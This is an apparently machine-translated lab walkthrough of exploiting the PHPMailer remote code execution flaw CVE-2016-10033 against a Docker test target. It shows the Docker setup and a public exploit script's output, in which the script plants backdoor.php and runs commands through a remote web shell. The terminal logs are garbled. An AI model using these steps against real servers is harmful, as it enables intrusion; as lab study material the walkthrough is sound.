Phpmailer < 5.2.18 remote Code execution Vulnerability (CVE-2016-10033)

Source: Internet
Author: User
Tags fully qualified domain name docker run cve

Phpmailer < 5.2.18 Remote Code execution

This article will briefly demonstrate the use of the Phpmailer Remote Code Execution Vulnerability (CVE-2016-10033), using a Docker environment that someone else has already built, see the reference link.

The lab environment is on Ubuntu 16.04.3, using Docker mirroring.

Installing and using Docker images

To install Docker on Ubuntu First, you can install it using the following command:

[Email protected]:~#apt-Get Install docker.io "Installing docker" [email protected]:~#Docker run--rm-it-p 8080: vulnerables/cve--10033 AH00558:apache2:Could not reliably determine the server's fully qualified domain name, using 172.17.0.2. Set the'ServerName'directive globally to suppress this message==>/var/log/apache2/access.log <====>/var/log/apache2/error.log <==[Thu Nov the  the: One:47.098917  .] [Mpm_prefork:notice] [PID8] ah00163:apache/2.4.Ten(Debian) Configured--resuming normal Operations[thu Nov the  the: One:47.101902  .] [Core:notice] [PID8] Ah00094:command Line:'/usr/sbin/apache2-f/etc/apache2/apache2.conf'==>/var/log/apache2/other_vhosts_access.log <==

After you install Docker, you need to download the appropriate target drone environment (pull), the first time you run the above command will download the Docker image, and then it will run as above, indicating that the Docker image is running.

Check the IP address:

[Email protected]:~#ifconfig|grepinet inet Addr: 172.17. 0.1 Bcast:0.0.0.0Mask:255.255.0.0inet6 addr:fe80:: the: 4aff:fe88:49e5/ -scope:link inet Addr: 192.168. 0.8 Bcast:192.168.0.255Mask:255.255.255.0Inet6 Addr:fe80::a7c0:e1f7:2118: 7e6a/ -scope:link inet Addr:127.0.0.1Mask:255.0.0.0Inet6 Addr: ::1/ -scope:host Inet6 addr:fe80::98a9:5bff:fe1f:b1c9/ -Scope:link

Here 192.168.0.8 is our Ubuntu IP address, 172.17.0.1 is the internal address of the Docker image, by visiting the http://192.168.0.8:8080/, we can see the building of the vulnerable environment:

Vulnerability Testing

Next we use Kali to test, download exploit-cve-2016-10033 in exploit.sh to local, run the following command to test:

[Email protected]:~/penetest/cve- .-10033#./exploit. SH 192.168. 0.8:8080 [+] Cve- .-10033exploit by opsxcq[+] Exploiting192.168.0.8:8080[+] Target exploited, acessing shell at http://192.168.0.8:8080/backdoor.php[+] CheckingifThe backdoor is created on target system[+] backdoor.php found on remote system[+] RunningWhoAmIwww-Dataremoteshell>ls[+] Runningls vulnerableRemoteshell>pwd[+] Runningpwd/www

In fact, not all command runs have echoes, such as the command to view the IP address Ifconfig will not see the output. For more information, please refer to the link below.

References

opsxcq/exploit-cve-2016-10033

Phpmailer < 5.2.18 remote Code execution Vulnerability (CVE-2016-10033)

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.